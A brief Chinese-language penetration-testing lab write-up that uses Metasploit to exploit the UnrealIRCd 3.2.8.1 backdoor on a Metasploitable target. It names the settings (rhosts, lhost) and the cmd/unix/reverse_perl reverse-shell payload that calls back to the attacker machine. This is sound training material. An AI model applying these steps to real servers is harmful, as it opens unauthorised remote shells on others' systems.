ircd_3281_backdoor 6667端口渗透
靶机:Metasploitable-linux ip:192.168.100.2
攻击机:kali 2021 ip:192.168.100.99
首先可以看到6667端口的irc服务开启了,版本为UnraIRCD,该版本下存在一个ircd_3281_backdoor的后门。那么直接利用,即可。
使用命令show options来查看需要哪些参数配置,可以看到需要rhosts(靶机ip), set rhosts 192.168.100.2(靶机ip),exploit/run进行渗透,但是没有渗透成功,看到报错信息,Exploit completed,but no session was created.这是因为没有攻击载荷。
使用命令show payloads查看可以使用的攻击载荷.利用载荷cmd/unix/reverse_perl
可以看到第一遍渗透的时候,可以发现失败了,根据报错信息,从中可以判断出需要配置lhost本地ip(攻击机ip),挂完攻击机ip后渗透成功。
渗透结束